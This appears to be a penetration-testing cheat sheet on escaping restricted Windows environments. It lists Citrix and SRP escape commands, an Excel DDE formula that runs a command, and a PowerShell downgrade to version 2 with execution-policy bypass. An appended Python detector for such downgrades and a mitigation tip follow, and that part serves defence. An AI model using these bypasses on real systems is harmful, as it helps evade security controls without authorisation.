✅ Environment escapes

Escape Citrix, or cmd.exe disabled by SRP (Software Restriction Policies)

runas /savecred /user:$USERNAME calc.exe
RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>


rundll32.exe user32.dll,LockWorkStation
start cmd

Escape Excel

Excel command execution through a macro:

=cmd|'/C calc.exe'!__xA1

Escape PowerShell

PowerShell evasion inside ConstrainedLanguage mode:

Method 1: Downgrade PowerShell to v2

powershell.exe -Version 2 -ep bypass -nop

Method 2: runas powershell ?
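
Defender-side view of Method 1, as an added example that is not part of the original page: the 2.0 engine predates ConstrainedLanguage mode, so a downgrade is worth alerting on. The Python below flags it in process command lines and in the EngineVersion field of classic "Windows PowerShell" Event ID 400 messages; all sample log data is constructed, and the baseline of engine 5 is an assumption about the fleet.

```python
import re

# Constructed sample data (not from the original page): process-creation
# command lines and message text of classic "Windows PowerShell" Event ID 400.
SAMPLE_CMDLINES = [
    "powershell.exe -Version 2 -ep bypass -nop",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /ver 2.0 -nop',
    r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
    "powershell.exe -Version 5.1 -NoLogo",
]
SAMPLE_EVENT_400 = [
    "Engine state is changed from None to Available.\n"
    "\tHostApplication=powershell.exe -Version 2 -ep bypass -nop\n"
    "\tEngineVersion=2.0\n",
    "Engine state is changed from None to Available.\n"
    "\tHostApplication=powershell.exe -NoProfile\n"
    "\tEngineVersion=5.1.19041.1\n",
]

_IS_POWERSHELL = re.compile(r"(?i)powershell(?:\.exe)?[\"']?(?=\s|$)")
# A switch token followed by a numeric value, e.g. "-Version 2" or "/ver 2.0".
_SWITCH = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+[\"']?(\d+)(?:\.\d+)*[\"']?(?=\s|$)")
_ENGINE = re.compile(r"EngineVersion=(\d+)(?:\.\d+)*")

def cmdline_requests_v2(cmdline: str) -> bool:
    """True if a powershell.exe command line asks for engine 2 via -Version.
    Any prefix of the switch name (-v, -ve, ... -version) counts as a match."""
    if not _IS_POWERSHELL.search(cmdline):
        return False
    return any("version".startswith(name.lower()) and major == "2"
               for name, major in _SWITCH.findall(cmdline))

def event400_engine_downgraded(message: str, minimum_major: int = 5) -> bool:
    """True if an Event ID 400 message reports an engine older than
    minimum_major (assumed baseline: Windows PowerShell 5.x everywhere)."""
    m = _ENGINE.search(message)
    return bool(m) and int(m.group(1)) < minimum_major

def triage():
    """Return (flagged command lines, flagged event messages) from the samples."""
    return ([c for c in SAMPLE_CMDLINES if cmdline_requests_v2(c)],
            [e for e in SAMPLE_EVENT_400 if event400_engine_downgraded(e)])

if __name__ == "__main__":
    cmds, events = triage()
    for hit in cmds + events:
        print("DOWNGRADE:", hit.strip().replace("\n", " | "))
```

Removing the Windows PowerShell 2.0 optional feature (MicrosoftWindowsPowerShellV2Root) takes the downgrade path away; the checks above remain useful on hosts where it is still installed.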
